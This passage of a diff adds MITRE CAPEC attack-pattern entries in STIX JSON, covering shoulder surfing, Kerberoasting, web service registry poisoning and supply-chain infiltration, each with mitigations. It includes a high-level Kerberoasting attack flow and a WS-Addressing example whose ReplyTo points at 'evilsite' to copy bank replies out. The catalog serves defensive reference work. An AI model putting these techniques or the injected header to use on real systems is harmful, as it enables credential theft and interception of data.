"https://capec.mitre.org/data/definitions/507.html" + } + ], + "id": "attack-pattern--debee1d7-930b-4daa-90e0-850d41c80cbd", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Physical Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "This type of attack requires the existence of a physical target that an adversary believes hosts something of value." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of attack, physical security techniques such as locks doors, alarms, and monitoring of targets should be implemented.", + "id": "course-of-action--a86bd9f5-9786-4d89-8d08-8c26d32b9178", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-507-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--150a1d7c-14ac-46f7-9e73-619a5595c6db", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a86bd9f5-9786-4d89-8d08-8c26d32b9178", + "target_ref": "attack-pattern--debee1d7-930b-4daa-90e0-850d41c80cbd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In a shoulder surfing attack, an adversary observes an unaware individual's keystrokes, screen content, or conversations with the goal of obtaining sensitive information. One motive for this attack is to obtain sensitive information about the target for financial, personal, political, or other gains. From an insider threat perspective, an additional motive could be to obtain system/application credentials or cryptographic keys. Shoulder surfing attacks are accomplished by observing the content \"over the victim's shoulder\", as implied by the name of this attack.", + "external_references": [ + { + "external_id": "CAPEC-508", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/508.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + } + ], + "id": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Shoulder Surfing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_example_instances": [ + "An adversary can capture a target's banking credentials and transfer money to adversary-controlled accounts.", + "An adversary observes the target's mobile device lock screen pattern/passcode and then steals the device, which can now be unlocked.", + "An insider could obtain database credentials for an application and sell the credentials on the black market.", + "An insider overhears a conversation pertaining to classified information, which could then be posted on an anonymous online forum." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary typically requires physical proximity to the target's environment, in order to observe their screen or conversation. This may not be the case if the adversary is able to record the target and obtain sensitive information upon review of the recording." + ], + "x_capec_skills_required": { + "Low": "In most cases, an adversary can simply observe and retain the desired information." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be mindful of your surroundings when discussing or viewing sensitive information in public areas.", + "id": "course-of-action--d898b88c-d850-4a06-bd12-57de9ee9c1e2", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-508-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--190133dc-952f-4cbc-864c-a85cc28a04fe", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d898b88c-d850-4a06-bd12-57de9ee9c1e2", + "target_ref": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pertaining to insider threats, ensure that sensitive information is not displayed to nor discussed around individuals without need-to-know access to said information.", + "id": "course-of-action--41704dad-06e1-4a59-9ab2-94b25763a063", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-508-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c24c04d4-0e8d-43c3-bd68-829df5ceff0a", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--41704dad-06e1-4a59-9ab2-94b25763a063", + "target_ref": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.", + "external_references": [ + { + "external_id": "CAPEC-509", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/509.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Steal or Forge Kerberos Tickets:Kerberoasting", + "external_id": "T1558.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1558/003" + }, + { + "description": "Jeff Warren, Extracting Service Account Passwords with Kerberoasting, 2017--05---09", + "external_id": "REF-559", + "source_name": "reference_from_CAPEC", + "url": "https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/" + }, + { + "description": "Kerberoasting Without Mimikatz, 2016--11---01", + "external_id": "REF-585", + "source_name": "reference_from_CAPEC", + "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + }, + { + "description": "Invoke-Kerberoast", + "external_id": "REF-586", + "source_name": "reference_from_CAPEC", + "url": "https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" + } + ], + "id": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Kerberoasting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "PowerSploit's Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for user accounts with set SPN values

    2. Techniques
    These can be found via Powershell or LDAP queries, as well as enumerating startup name accounts and other means.

  2. Request service tickets

    3. Techniques
    Using user account's SPN value, request other service tickets from Active Directory

Experiment

  1. Extract ticket and save to disk

    2. Techniques
    Certain tools like Mimikatz can extract local tickets and save them to memory/disk.

Exploit

  1. Crack the encrypted ticket to harvest plain text credentials

    2. Techniques
    Leverage a brute force application/script on the hashed value offline until cracked. The shorter the password, the easier it is to crack.
", + "x_capec_prerequisites": [ + "The adversary requires access as an authenticated user on the system. This attack pattern relates to elevating privileges.", + "The adversary requires use of a third-party credential harvesting tool (e.g., Mimikatz).", + "The adversary requires a brute force tool." + ], + "x_capec_skills_required": { + "Medium": "" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal access.", + "id": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--445d759f-d21c-4325-a510-bd6e24de839d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust password policy for service accounts. Passwords should be of adequate length and complexity, and they should expire after a period of time.", + "id": "course-of-action--523888c0-0594-4b49-a1f3-c0cccdcec0eb", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2a47d13-bffb-4f8b-94f6-aeeb94afc153", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523888c0-0594-4b49-a1f3-c0cccdcec0eb", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ the principle of least privilege: limit service accounts privileges to what is required for functionality and no more.", + "id": "course-of-action--7659d2c2-f9c5-4599-8c79-7d29ae80e31c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8893293-d02b-4ee1-9f85-56386750d82f", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7659d2c2-f9c5-4599-8c79-7d29ae80e31c", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.", + "id": "course-of-action--566e2dfe-a0ce-4bcb-8e9d-2fa5450391dc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee90edd2-2b62-435a-9e2e-f24f212d13ba", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--566e2dfe-a0ce-4bcb-8e9d-2fa5450391dc", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces.", + "external_references": [ + { + "external_id": "CAPEC-51", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/51.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + } + ], + "id": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Poison Web Service Registry", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.\n http://example.com/Message\n http://valid.example/validClient\n http://evilsite/evilClient\n http://validfaults.example/ErrorHandler\n \n \n In this example \"evilsite\" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with ReplyTo header it will not generate a Soap fault.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a target SOA or Web Service: The adversary must first indentify a target SOA or Web Service.

Experiment

  1. Determine desired outcome: Because poisoning a web service registry can have different outcomes, the adversary must decide how they wish to effect the webservice.

    2. Techniques
    An adversary can perform a denial of service attack on a web service.
    An adversary can redirect requests or responses to a malicious service.

  2. Determine if a malicious service needs to be created: If the adversary wishes to redirect requests or responses, they will need to create a malicious service to redirect to.

    3. Techniques
    Create a service to that requests are sent to in addition to the legitimate service and simply record the requests.
    Create a service that will give malicious responses to a service provider.
    Act as a malicious service provider and respond to requests in an arbitrary way.

Exploit

  1. Poison Web Service Registry: Based on the desired outcome, poison the web service registry. This is done by altering the data at rest in the registry or uploading malicious content by spoofing a service provider.

    2. Techniques
    Intercept and change WS-Adressing headers to route to a malicious service or service provider.
    Provide incorrect information in schema or metadata to cause a denial of service.
    Delete information about service procider interfaces to cause a denial of service.
", + "x_capec_extended_description": "\n WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to resources or redirect access to the service registry." + ], + "x_capec_resources_required": [ + "Capability to directly or indirectly modify registry resources" + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9eeb3709-308b-45ca-90e5-649033d1458c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Harden registry server and file access permissions", + "id": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-51-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement communications to and from the registry using secure protocols", + "id": "course-of-action--6bfceaeb-b87d-430f-aa56-ddb8fa9e9e6f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-51-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dab8cada-a8f1-46a8-a212-2685d9e6bf9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6bfceaeb-b87d-430f-aa56-ddb8fa9e9e6f", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user's session. This attack is executed after a trusted user is authenticated into a cloud service, \"piggy-backing\" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.", + "external_references": [ + { + "external_id": "CAPEC-510", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/510.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "description": "Ami Luttwak, A new Zeus variant targeting Salesforce.com – Research and Analysis, Adallom, Inc.", + "external_id": "REF-438", + "source_name": "reference_from_CAPEC", + "url": "http://www.adallom.com/blog/a-new-zeus-variant-targeting-salesforce-com-accounts-research-and-analysis/" + } + ], + "id": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "modified": "2014-06-23T00:00:00.000Z", + "name": "SaaS User Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the trusted user's system and convince the user to execute it while authenticated to the SaaS application." + ], + "x_capec_skills_required": { + "Medium": "This attack pattern often requires the technical ability to modify a malicious software package (e.g. Zeus) to spider a targeted site and a way to trick a user into a malicious software download." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To limit one's exposure to this type of attack, tunnel communications through a secure proxy service.", + "id": "course-of-action--e62f0d4e-f4f4-4170-83dc-b3e1355d1c94", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0e244a6-ae66-4ca3-bd73-5e27032bc927", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e62f0d4e-f4f4-4170-83dc-b3e1355d1c94", + "target_ref": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Detection of this type of attack can be done through heuristic analysis of behavioral anomalies (a la credit card fraud detection) which can be used to identify inhuman behavioral patterns. (e.g., spidering)", + "id": "course-of-action--ac725580-35cd-425b-84ba-2c7669ba0116", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--217875b4-959c-4ec6-a80c-6f5897b54681", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac725580-35cd-425b-84ba-2c7669ba0116", + "target_ref": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses common delivery mechanisms such as email attachments or removable media to infiltrate the IDE (Integrated Development Environment) of a victim manufacturer with the intent of implanting malware allowing for attack control of the victim IDE environment. The attack then uses this access to exfiltrate sensitive data or information, manipulate said data or information, and conceal these actions. This will allow and aid the attack to meet the goal of future compromise of a recipient of the victim's manufactured product further down in the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-511", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/511.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Infiltration of Software Development Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "The attacker, knowing the victim runs email on a system adjacent to the IDE system, sends a phishing email with a malicious attachment to the victim. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent IDE system from the victim's workstation. The attacker is then able to exfiltrate sensitive data about the software being developed on the IDE system.", + "Using rogue versions of Xcode (Apple's app development tool) downloaded from third-party websites, it was possible for the adversary to insert malicious code into legitimate apps during the development process." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." + ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid the common delivery mechanisms of adversaries, such as email attachments, which could introduce the malware.", + "id": "course-of-action--93c2b59e-bb08-4808-9f42-695b972f908e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-511-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acf31545-11ce-4c74-9740-158a6572cd6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93c2b59e-bb08-4808-9f42-695b972f908e", + "target_ref": "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component during the product development and research phases. This can lead to adjustments and calibrations being made in the product so that when the final product, now containing the modified component, is deployed it will not perform as designed and be advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-516", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/516.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply 